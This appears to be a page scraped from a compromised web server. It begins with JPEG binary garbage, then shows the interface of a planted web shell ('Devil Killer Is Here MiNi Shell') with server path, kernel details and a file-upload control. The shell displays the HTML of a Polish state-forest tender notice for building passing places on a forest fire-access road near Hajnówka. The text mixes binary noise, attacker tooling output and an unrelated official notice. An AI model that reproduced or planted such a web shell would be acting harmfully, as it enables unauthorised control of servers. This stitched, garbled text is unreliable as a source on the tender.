JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240529/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240529/0034544601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przebudowa drogi leśnej w ramach zadania pn.: „Budowa mijanek na drodze leśnej – dojazd pożarowy nr 13” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Hajnówka</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Nadleśnictwo Hajnówka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 050026472</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kolejki Leśne 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Hajnówka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">17-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL842 - Łomżyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">hajnowka@bialystok.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.hajnowka.bialystok.lasy.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przebudowa drogi leśnej w ramach zadania pn.: „Budowa mijanek na drodze leśnej – dojazd pożarowy nr 13” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-55ddce0b-1daa-11ef-bfd3-e6cc5d6d04e5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00345446</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lasy_hajnowka <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem www.platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/lasy_hajnowka 2.W celu skrócenia czasu udzielenia odpowiedzi na<br/>pytania preferuje się aby komunikacja między zamawiającym a wykonawcami, w tym wszelkie<br/>oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za<br/>pośrednictwem platformazakupawa.pl i formularza &#34;Wyślij wiadomość do zamawiającego&#34;<br/>https://platformazakupowa.pl/pn/lasy_hajnowka</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">przesyłanego za pośrednictwem<br/>dedykowanych formularzy do:<br/>złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to<br/>maksymalnie 500 MB. a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej<br/>niż 512 kb/s,b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram,<br/>procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7,<br/>Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja<br/>10.0,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.<br/>Oferta musi być sporządzona w języku polskim, w formie elektronicznej opatrzonej kwalifikowanym<br/>podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym, w formacie danych: .pdf, .doc, .docx, .rtf,.xps, .odt.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) Administratorem danych osobowych jest Nadleśnictwo Hajnówka ul. Kolejki leśne 12, 17-200<br/>Hajnówka zwane dalej Administratorem Danych, tel.: 85 683 23 78, e-mail:<br/>hajnowka@bialystok.lasy.gov.pl<br/>2) w sprawach związanych z przetwarzaniem danych osobowych proszę kontaktować się z<br/>Inspektorem Ochrony Danych Rafałem Piątkiem pod adresem e-mail: iodhajnowka@projektpdp.pl 3)<br/>celem przetwarzania danych osobowych jest wywiązanie się z warunków określonych w umowie bądź<br/>podjęcie działań zmierzających do przygotowania umowy pod kątem jej przyszłej realizacji.<br/>4) Podstawą prawną przetwarzania danych osobowych jest:<br/>a) art. 6 ust. 1 lit. b) RODO - przetwarzanie danych osobowych jest niezbędne do wykonania umowy<br/>lub do podjęcia działań na żądanie osoby, której dane dotyczą, przed zawarciem umowy oraz<br/>b) art. 6 ust. 1 lit. f) RODO -przetwarzanie jest niezbędne do celów wynikających z prawnie<br/>uzasadnionych interesów realizowanych przez administratora<br/>5) dane osobowe mogą być przekazywane innym jednostkom organizacyjnym PGL Lasy Państwowe,<br/>podmiotom uprawnionym na podstawie odrębnych przepisów prawa, jak również innym podmiotom<br/>świadczącym prawne czy doradcze na rzecz Administratora.<br/>6) Dane osobowe nie są przekazywane poza Europejski Obszar Gospodarczy lub organizacji<br/>międzynarodowej.7) Każda osoba, której dane dotyczą, ma prawo do:<br/>a) dostępu do treści swoich danych oraz otrzymania ich kopii (art. 15 RODO),<br/>b) sprostowania danych (art. 16. RODO), c) ograniczenia przetwarzania danych (art. 18 RODO),<br/>d) wniesienia sprzeciwu wobec przetwarzania danych (art. 21 RODO),<br/>e) niepodlegania decyzjom podjętym w warunkach zautomatyzowanego przetwarzania danych, w tym profilowania (art. 22 RODO), f)<br/>Danych Osobowych, ul. Stawki<br/>2, 00 - 193 Warszawa) nadzorującego zgodność przetwarzania danych z przepisami o ochronie danych<br/>osobowych. 8) Administrator ma obowiązek przechowywać dane osobowe nie dłużej niż przez okres<br/>wynikający z<br/>przepisów prawa, jak również Zarządzenia Dyrektora Generalnego Lasów Państwowych w sprawie<br/>jednolitego rzeczowego wykazu akt PGL w Lasach Państwowych.<br/>9) Podanie danych osobowych jest wymogiem umownym. Osoba, której dane dotyczą, nie jest<br/>zobowiązana do ich podania. Niepodanie danych osobowych skutkuje brakiem możliwości zawarcia i<br/>realizacji umowy.<br/>10) Dane osobowe nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu.<br/>Jeżeli Wykonawca, w ramach realizacji niniejszej umowy, będzie pozyskiwał dane osobowe w<br/>rozumieniu art. 4. pkt. 1 RODO do celów realizacji niniejszej umowy, Wykonawca zobowiązany jest za<br/>każdym razem w momencie pozyskania danych osobowych, spełnić względem tych osób obowiązek<br/>informacyjny wynikający z art. 14 RODO.<br/>W zakresie nieuregulowanym niniejszą Umową mają zastosowanie przepisy prawa obowiązującego na<br/>terenie Rzeczypospolitej Polskiej, w tym rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy<br/>95/46/WE.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.8.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1. Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na budowie mijanek na drodze leśnej –<br/>dojazd pożarowy nr 13 na terenie administracyjnym Nadleśnictwa Hajnówka <br/>3.2. Roboty budowlane będące przedmiotem zamówienia należy wykonać zgodnie z:<br/>1) projektem budowlanym, wykonawczym oraz technicznym,<br/>2) specyfikacją techniczną wykonania i odbioru robót budowlanych („STWiOR”),<br/>3) przedmiarem robót,<br/>4) pozwoleniem na budowę,<br/>5) obowiązującymi przepisami prawa,<br/>6) zasadami sztuki budowlanej.<br/>3.3. Szczegółowy zakres robót budowlanych został ujęty w dokumentacji projektowej, stanowiącej załącznik nr 1, nr 1a, nr<br/>1b i nr 1c do niniejszej SWZ. W zakres dokumentacji wchodzi: Specyfikacja Techniczna Wykonania i Odbioru Robót<br/>(STWiOR), Projekt architektoniczno – budowlany, Projekt wykonawczy i Przedmiar robót;<br/>Zamawiający wymaga wykonania robót objętych niniejszym zamówieniem tj. robót wyszczególnionych w kosztorysie<br/>oferenta stanowiącym - załącznik nr 3 do SWZ (budowa mijanek – dojazd pożarowy nr 13.<br/>Wykonawca przedstawi w ofercie cenę jednostkową za każdą czynność wchodzącą w zakres przedmiotu zamówienia –<br/>zgodnie z kosztorysem ofertowym.<br/>UWAGA: Zamawiający za realizację przedmiotu zamówienia przewiduje wynagrodzenie kosztorysowe. Cenę należy<br/>skalkulować na podstawie przedmiaru robót sporządzając kosztorys ofertowy w wersji szczegółowej. Kosztorys ofertowy jest<br/>integralną częścią oferty i NIE PODLEGA UZUPEŁNIENIU. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-01 do 2024-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">w ramach kryterium „Cena” oferta może uzyskać maksymalnie 60,00<br/>[pkt].<br/>C = Najniższa cena spośród złożonych ofert [zł] (Cn)/Cena oferty badanej [zł] (Co)x 60,00 [pkt]<br/>C - liczba punktów w ramach kryterium „Cena”<br/>Cn - Najniższa cena spośród złożonych ofert Co - Cena oferty badanej<br/>W kryterium „cena” oferta może uzyskać maksymalnie 60,00 [pkt]<br/>w ramach kryterium „Okres gwarancji i rękojmi” ocena ofert zostanie dokonana przy zastosowaniu<br/>tabeli w sposób następujący:<br/>Ilość miesięcy Liczba punktów<br/>60 0 pkt<br/>61-67 10 pkt<br/>68-75 20 pkt<br/>76-83 30 pkt<br/>84 i więcej 40 pkt<br/>Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie tego kryterium, przyjmuje<br/>się 40 pkt.<br/>Sposób obliczania punktów dla kryterium gwarancji:<br/>a) Kryterium „gwarancja” na całość zamówienia będzie rozpatrywane na podstawie zadeklarowanego<br/>w formularzu ofertowym okresu gwarancji i rękojmi;<br/>b) W ramach tego kryterium zamawiający przyzna punkty za udzielenie okresu gwarancji na wykonany<br/>przedmiot zamówienia dłuższy niż 60 miesięcy tj. od minimalnego okresu wymaganego przez<br/>Zamawiającego, przy czym Wykonawca deklarując 60 miesięcy w formularzu ofertowym otrzyma 0<br/>punktów w ramach kryterium „gwarancja”; c) Najkrótszy możliwy okres gwarancji i rękojmi wymagany przez Zamawiającego to 60<br/>miesiące<br/>liczone od daty ostatecznego odbioru robót, przy czym bieg gwarancji i rękojmi rozpoczyna się z datą<br/>bezusterkowego odbioru protokołu końcowego.<br/>d) Najdłuższy okres gwarancji i rękojmi jaki będzie uwzględniany przy ocenie oferty to okres 84<br/>miesiące. Wykonawca deklarując okres gwarancji i rękojmi dłuższy niż 84 miesiące, otrzyma 40<br/>punktów w ramach kryterium „gwarancja”; gwarancji i rękojmi muszą pokrywać się ze sobą. Jeżeli Wykonawca wpisze okres<br/>gwarancji i rękojmi<br/>krótszy niż 60 miesięcy to przygotuje ofertę niezgodnie z SWZ co skutkować będzie odrzuceniem<br/>oferty, jako niezgodnej z treścią SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu określone przez<br/>Zamawiającego w zakresie:<br/>a) zdolności do występowania w obrocie gospodarczym –<br/>Zamawiający nie stawia warunku w powyższym zakresie;<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów –<br/>Zamawiający nie stawia warunku w powyższym zakresie; Zamawiający nie stawia warunku w powyższym zakresie;<br/>d) zdolności technicznej lub zawodowej –<br/>- warunek ten, w zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia zostanie uznany za spełniony,<br/>jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować co najmniej 1 osobą z uprawnieniami budowlanymi w<br/>zakresie specjalności inżynieryjnej drogowej do kierowania robotami budowlanymi (kierownik budowy), zgodnie z<br/>Rozporządzeniem Ministra Inwestycji i Rozwoju w sprawie przygotowania zawodowego, złożone na formularzu<br/>stanowiącym załącznik nr 8 do SWZ,<br/>- warunek w zakresie oświadczenia, zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 5 lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał<br/>należycie co najmniej jedną robotę budowlaną o podobnym charakterze, o wartości nie mniejszej niż: 400 000,00 zł brutto,<br/>wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów na rzecz których zostały wykonane, złożone<br/>na formularzu stanowiące załącznik nr 9 do SWZ, z załączeniem dowodów określających czy te roboty budowlane zostały<br/>wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot,<br/>na rzecz którego roboty budowlane były wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. Zamawiający nie dopuszcza możliwości sumowania robót<br/>budowlanych o mniejszej wartości w celu uzyskania wskazanej wartości.<br/>Jeżeli roboty budowlane wykonywane były na rzecz Zamawiającego w/w dowody nie są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz wykonanych robót<br/>budowlanych o wartości co najmniej 500 000,00 zł brutto, wykonanych w okresie ostatnich 5 lat przed upływem terminu składania<br/>ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości brutto, przedmiotu (rodzaju<br/>wykonanych robót), dat (dat dziennych rozpoczęcia i zakończenia realizacji) i miejsc wykonania oraz podmiotów, na rzecz których<br/>roboty zostały wykonane (wzór wykazu wykonanych robót stanowi załącznik nr 9 do SWZ), dowody, że wskazane przez Wykonawcę<br/>roboty budowlane na potwierdzenie spełnienia warunku udziału w postępowaniu, dotyczące zawodowej w zakresie doświadczenia,<br/>zostały wykonane należycie.<br/>Dowodami, o których mowa powyżej są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty<br/>budowlane były wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów –<br/>inne odpowiednie dokumenty;<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonanych wspólnie z innymi wykonawcami<br/>informacje, o których mowa wyżej dotyczą robót faktycznie przez niego wykonanych, a w przypadku świadczeń powtarzających się<br/>lub ciągłych - również faktycznie przez niego wykonywanych.<br/>wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do<br/>wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacji o podstawie do dysponowania tymi<br/>osobami (załącznik nr 8).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu<br/>ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów<br/>(tekst jedn. Dz.U. z 2020 r. poz. 1076 ze zm.), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenie o przynależności<br/>do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej (załącznik nr 7<br/>do SWZ).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od wykonawców przedłożenia przedmiotowych środków dowodowych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Przed upływem terminu składania ofert Wykonawca zobowiązany jest wnieść wadium w wysokości 8 000,00 zł (słownie:<br/>osiem tysięcy złotych).<br/>11.2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania<br/>ofertą, z wyjątkiem przypadków, gdy zawarto umowę (art. 98 ust. 1 pkt 2 PZP) albo unieważniono postępowanie (art. 98ust.<br/>1 pkt 3 PZP) lub złożono wniosek o zwrot wadium (art. 98 ust. 2 PZP).<br/>11.3. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 